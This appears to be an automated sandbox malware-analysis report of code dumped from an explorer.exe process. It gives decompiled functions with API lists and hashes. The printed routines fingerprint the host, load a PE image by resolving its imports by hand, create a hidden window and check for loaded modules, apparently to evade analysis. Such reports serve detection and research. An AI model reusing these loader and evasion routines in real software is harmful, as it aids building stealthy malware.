0x000e4c9e
0x000e4ad7
0x000e4ad7
0x00000000
0x000e4ad7
0x000e4c7d
0x000e4b5c
0x000e4b6a
0x000e4b7d
0x000e4b82
0x000e4b88
0x000e4b8a
0x000e4ba2
0x000e4ba7
0x000e4bb0
0x000e4bb6
0x00000000
0x000e4bb6
0x000e4b92
0x000e4b9b
0x00000000
0x000e4b9b
0x000e4afe
0x000e4b04
0x000e4b06
0x000e4b44
0x000e4b46
0x00000000
0x00000000
0x000e4b48
0x000e4b4c
0x00000000
0x000e4b4c
0x000e4b08
0x000e4b12
0x000e4b1e
0x000e4b29
0x000e4b30
0x000e4b3a
0x000e4b3f
0x00000000
0x000e4b3f
0x000e4ad5
0x00000000
0x000e4a59
0x000e4a64
0x000e4a6a
0x000e4a6c
0x000e4d57
0x000e4d57
0x000e4d59
0x000e4d5f
0x000e4d5f
0x00000000
0x000e4a6c

APIs

memset.MSVCRT ref: 000E4A20
lstrcpyW.KERNEL32(00000000,00000000), ref: 000E4D12
lstrcatW.KERNEL32 ref: 000E4D30
lstrcatW.KERNEL32 ref: 000E4D34
lstrcatW.KERNEL32 ref: 000E4D3C
lstrcpyW.KERNEL32(00000000,00000000), ref: 000E4D42

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 0e74a2a4a823a2a7c71f9a44fa5e6bbe768ff8fc152e5fa2d00e7b2fca77e5df
Instruction ID: 2802b0e30ef46d6ccc975fd4b749fc53688d39db8f5afabd6a5a1aa2c25e9ae1
Opcode Fuzzy Hash: 0e74a2a4a823a2a7c71f9a44fa5e6bbe768ff8fc152e5fa2d00e7b2fca77e5df
Instruction Fuzzy Hash: 3091D171604384AFE754EB22DC46FBE73E9AF84310F14492DF655AB292EF74D9048B42

Uniqueness

Uniqueness Score: -1.00%

Function 000EB7EA, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E000EB7EA(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000E95C2(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000E85B6( &_v16);
				_t33 = E000EC3D4(_t43);
				E000E9621( &(_t43[E000EC3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E000EC3D4(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E000ED442(_t43, E000EC3D4(_t43) + _t40, 0);
			}

0x000eb7ea
0x000eb7f3
0x000eb7ff
0x000eb805
0x000eb807
0x000eb80f
0x000eb822
0x000eb831
0x000eb83c
0x000eb849
0x000eb863
0x000eb868
0x000eb86a
0x000eb871
0x000eb881
0x000eb892
0x000eb89c
0x000eb8a4
0x000eb8ab
0x000eb8ae
0x000eb8cb

APIs

memset.MSVCRT ref: 000EB807
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000EB822
lstrcpynW.KERNEL32(?,?,00000100), ref: 000EB831
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000EB863

Part of subcall function 000E9621: _vsnwprintf.MSVCRT ref: 000E963E

lstrcatW.KERNEL32 ref: 000EB89C
CharUpperBuffW.USER32(?,00000000), ref: 000EB8AE

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: 70f90f763a8b6cd3593922d68b5c51a4511563bb52a6fb36b909f1cdb0d540b3
Instruction ID: 1103b2e503edfa345b5aecbc20de84fa757629233c1b8e59e74f04d9cb1acd1c
Opcode Fuzzy Hash: 70f90f763a8b6cd3593922d68b5c51a4511563bb52a6fb36b909f1cdb0d540b3
Instruction Fuzzy Hash: 132162B2A40218BFE710ABB5DC4AFEE77ACDB44310F108165F506E6192EE755B44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000ECFC6, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E000ECFC6(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xfe688; // 0x80000
				GetCurrentProcess();
				_t11 = E000EBA47(); // executed
				_t1 = _t29 + 0x1644; // 0x81644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E000E8F9F(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x80228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E000E8F9F(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E000EE3F8(_t3);
				_t7 = _t29 + 0x220; // 0x80220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E000EE433(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x000ecfc9
0x000ecfcb
0x000ecfd2
0x000ecfda
0x000ecfe4
0x000ecfe4
0x000ecfea
0x000ecff3
0x000ecff9
0x000ecffb
0x000ecfff
0x000ecfff
0x000ed004
0x000ed00a
0x000ed01a
0x000ed024
0x000ed02c
0x000ed02f
0x000ed03b
0x000ed041
0x000ed046
0x000ed04c
0x000ed052
0x000ed058
0x000ed060

APIs

GetCurrentProcess.KERNEL32(?,?,00080000,?,000E3538), ref: 000ECFD2
GetModuleFileNameW.KERNEL32(00000000,00081644,00000105,?,?,00080000,?,000E3538), ref: 000ECFF3
memset.MSVCRT ref: 000ED024
GetVersionExA.KERNEL32(00080000,00080000,?,000E3538), ref: 000ED02F
GetCurrentProcessId.KERNEL32(?,000E3538), ref: 000ED035

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 61abeedb1132260fafa4bbd9ba5834f7c18cb15a2764ec4b3482b7365f170a7f
Instruction ID: 65350bb64423cbfd600d9b3c81e0d37274830278c0425ad4f7143f020ba2a3b5
Opcode Fuzzy Hash: 61abeedb1132260fafa4bbd9ba5834f7c18cb15a2764ec4b3482b7365f170a7f
Instruction Fuzzy Hash: CA01B170A01B449FE720AF71D80ABEA7BE5EF80310F44082DF55A93292EF746545CB54

Uniqueness

Uniqueness Score: -1.00%

Function 000F24D3, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E000F24D3(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E000EE0DB(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000f24d9
0x000f24e1
0x000f24f6
0x000f2508
0x000f2514
0x000f251a
0x000f251f
0x000f252b
0x000f2696
0x00000000
0x000f2696
0x000f2531
0x000f253a
0x000f2548
0x000f254b
0x000f255a
0x000f255a
0x000f2561
0x000f256f
0x000f2572
0x000f2589
0x000f258f
0x000f2596
0x000f25a6
0x000f25be
0x000f25a8
0x000f25b0
0x000f25b0
0x000f25c1
0x000f25c5
0x000f25d1
0x000f25d5
0x000f25d9
0x000f25dd
0x000f25e9
0x000f2614
0x000f261c
0x000f262e
0x000f263a
0x000f25eb
0x000f25f0
0x000f25fb
0x000f2607
0x000f2607
0x000f2643
0x000f2649
0x000f2653
0x000f266f
0x000f2655
0x000f2664
0x000f2664
0x000f2653
0x000f2677
0x000f2680
0x000f2680
0x000f268e
0x00000000
0x000f268e
0x000f259a
0x00000000
0x000f259a
0x00000000
0x000f2572
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000F24F0
LoadLibraryA.KERNEL32(00000000), ref: 000F2589

Strings

GetProcAddress, xrefs: 000F24F9
kernel32.dll, xrefs: 000F24EB

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 1cefd5fd9a79721ec718500bcac3ee3d4780c24e35d07049126864536a4d0623
Instruction ID: c1bbabc2859f30c1a124616d92cb820d8ec69e674bc7cb829c3d8e800eb3d067
Opcode Fuzzy Hash: 1cefd5fd9a79721ec718500bcac3ee3d4780c24e35d07049126864536a4d0623
Instruction Fuzzy Hash: 72619E75900209EFDB50CF98C885BADBBF1FF08315F248599E915EB2A1D774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 000E2ECD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E000E2ECD(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0xfe684; // 0x25bf8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0xfe688; // 0x80000
				E000E900E(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E000E2E6A;
				_push( &_v52);
				_t32 =  *0xfe694; // 0x25bfa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0xfe718; // 0x801ea
					if(_t34 != 0) {
						_t39 =  *0xfe694; // 0x25bfa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0xfe694; // 0x25bfa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0xfe718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0xfe694; // 0x25bfa48
				 *((intOrPtr*)(_t47 + 0x18))( *0xfe718);
				while(1) {
					_t50 =  *0xfe694; // 0x25bfa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0xfe694; // 0x25bfa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0xfe694; // 0x25bfa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x000e2ed6
0x000e2ee5
0x000e2eec
0x000e2ef1
0x000e2f0b
0x000e2f13
0x000e2f20
0x000e2f27
0x000e2f2d
0x000e2f34
0x000e2f35
0x000e2f3a
0x000e2f43
0x000e2fc0
0x000e2fc0
0x000e2fc7
0x000e2fca
0x000e2fcf
0x000e2fcf
0x000e2fd2
0x000e2fda
0x000e2fdf
0x000e2fe7
0x000e2fe7
0x000e2f6a
0x000e2f6d
0x000e2f74
0x00000000
0x00000000
0x000e2f7d
0x000e2f80
0x000e2f8b
0x000e2fad
0x000e2fb4
0x000e2fb9
0x000e2fbe
0x00000000
0x00000000
0x000e2f93
0x00000000
0x00000000
0x000e2f99
0x000e2f9e
0x000e2fa5
0x000e2faa
0x000e2faa
0x00000000

APIs

memset.MSVCRT ref: 000E2EEC
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000E2F6A
ShowWindow.USER32(00000000,00000000), ref: 000E2F7D

Strings

0, xrefs: 000E2F20

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: ba7bf7e37ebe7236805db9d6ac758f7b63c2e4f22348c0984837463357db774d
Instruction ID: e3c81a8d63932a7c2c3c4086c3d3f3babdc90bf553397dd283ba832e805b6b7c
Opcode Fuzzy Hash: ba7bf7e37ebe7236805db9d6ac758f7b63c2e4f22348c0984837463357db774d
Instruction Fuzzy Hash: 183105B1500248AFF740DBA8DC89FAE7BBCEB28384F004065F509E7662D674DD45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000E4D60, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E000E4D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xfe688; // 0x80000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E000EB7EA(0xfb9c4,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E000EA8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E000EA4B3( &_v556, _t298);
					 *0xfe748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E000EE1FE(0xfb9c8, _t299); // executed
						 *0xfe680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000E95C2(0xfb9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xfe688; // 0x80000
						_t127 = E000E92C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000E85B6( &_v612);
						_t130 = E000EB2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000E85FB( &_v616, 0xfffffffe);
						_t133 =  *0xfe688; // 0x80000
						_t22 = _t133 + 0x114; // 0x80114
						E000E49FE( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xfe688; // 0x80000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xfe680; // 0x25bfdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E000EE308(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xfe6b4; // 0x25bfa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E000EE308(_t353,  &_v588);
								_t235 =  *0xfe6b4; // 0x25bfa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xfe73c;
							if( *0xfe73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xfe680; // 0x25bfdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xfe688; // 0x80000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000E4998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xfe684; // 0x25bf8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xfe688; // 0x80000
											_t184 = E000EFC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000E85E5(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E000E109A(_t262, 0x148);
													_t305 =  *0xfe688; // 0x80000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E000E900E(_t271,  &_v572);
													_t272 =  *0xfe688; // 0x80000
													_t188 = E000E60C0( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xfe688; // 0x80000
														__eflags = _t200 + 0x1020;
														E000E9621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000E85B6( &_v636);
														E000EA953(_t333, 0, 0xbb8, 1); // executed
														E000E85FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000E85FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000E4998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xfe684; // 0x25bf8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000E85E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000E95C2(_t278, 0x32d);
										_t280 =  *0xfe688; // 0x80000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E000E9621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000E85B6( &_v636);
										E000EA953(_t249, 0, 0xbb8, 1);
										E000E85FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000E95C2(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xfe688; // 0x80000
								_t329 = E000E92C6(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E000EB2AB(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xfe684; // 0x25bf8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000E85FB( &_v612, 0xfffffffe);
								}
								E000E85B6( &_v616);
								_t150 =  *0xfe688; // 0x80000
								lstrcpynW(_t150 + 0x438,  *0xfe740, 0x105);
								_t153 =  *0xfe688; // 0x80000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xfe738, 0x105);
								_t331 =  *0xfe688; // 0x80000
								_t117 = _t331 + 0x228; // 0x80228
								 *((intOrPtr*)(_t331 + 0x434)) = E000E8F9F(_t117, __eflags);
								E000E85FB(0xfe740, 0xfffffffe);
								E000E85FB(0xfe738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000E95A8(0x6e2);
				_v616 = _t250;
				_t326 = E000E95A8(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000E85A3( &_v616);
					_t122 = E000E85A3( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x000e4d60
0x000e4d66
0x000e4d6c
0x000e4d71
0x000e4d7f
0x000e4d82
0x000e4de1
0x000e4dea
0x000e4df3
0x000e4df6
0x000e4dfd
0x000e4e02
0x000e4e07
0x000e4e0e
0x000e4e18
0x000e4e1f
0x000e4e25
0x000e4e2a
0x000e4e2f
0x000e4e36
0x000e4e3c
0x000e4e3e
0x000e4e3f
0x000e4e43
0x000e4e4e
0x000e4e53
0x000e4e5c
0x000e4e61
0x000e4e69
0x000e4e70
0x000e4e71
0x000e4e73
0x000e4e8f
0x000e4e92
0x000e4e92
0x000e4e9b
0x000e4ea0
0x000e4eb0
0x000e4eb8
0x000e4ebd
0x000e4ec3
0x000e4ec6
0x000e4ecc
0x000e4eeb
0x000e4ef1
0x000e4ef2
0x000e4ef3
0x000e4ef4
0x000e4ef5
0x000e4ef6
0x000e4f00
0x000e4f04
0x000e4f09
0x000e4f0c
0x000e4f0e
0x000e4f20
0x000e4f20
0x000e4f22
0x000e4f2e
0x000e4f33
0x000e4f39
0x000e4f42
0x000e4f45
0x000e4f47
0x000e4f52
0x000e4f57
0x000e4f5c
0x000e4f61
0x000e4f61
0x000e4f64
0x000e4f6b
0x00000000
0x000e4f71
0x000e4f71
0x000e4f76
0x000e4f7a
0x000e4f7c
0x000e4f7f
0x000e4f81
0x000e4f87
0x000e4f87
0x000e4f81
0x000e4f89
0x000e4f8e
0x000e4f94
0x000e4f96
0x00000000
0x000e4f9c
0x000e4f9c
0x000e4fa0
0x000e5075
0x000e507b
0x000e5081
0x000e508c
0x000e508d
0x000e508e
0x000e508f
0x000e5095
0x000e509a
0x000e50a0
0x000e50a8
0x000e50ae
0x000e50b1
0x000e50c0
0x000e50c7
0x000e50ca
0x000e50d7
0x000e50db
0x000e50e8
0x000e50ed
0x000e50f0
0x000e50f2
0x000e5103
0x000e5105
0x000e5109
0x000e510a
0x000e510c
0x000e5117
0x000e511c
0x000e5129
0x000e512d
0x000e512e
0x000e5130
0x000e5138
0x000e5139
0x000e513e
0x000e5156
0x000e515b
0x000e515e
0x000e5162
0x000e5164
0x000e5177
0x000e5181
0x000e5185
0x000e518d
0x000e518e
0x000e5196
0x000e5197
0x000e519c
0x000e51a8
0x000e51b2
0x000e51c4
0x000e51d0
0x000e51d5
0x000e51d5
0x000e51df
0x000e51e5
0x000e51e5
0x000e510c
0x000e50f2
0x00000000
0x000e507b
0x000e4fa6
0x000e4fa9
0x00000000
0x00000000
0x000e4faf
0x000e4fba
0x000e4fbb
0x000e4fbc
0x000e4fbd
0x000e4fc3
0x000e4fc8
0x000e4fdc
0x000e4fe1
0x000e4fe5
0x000e4ff0
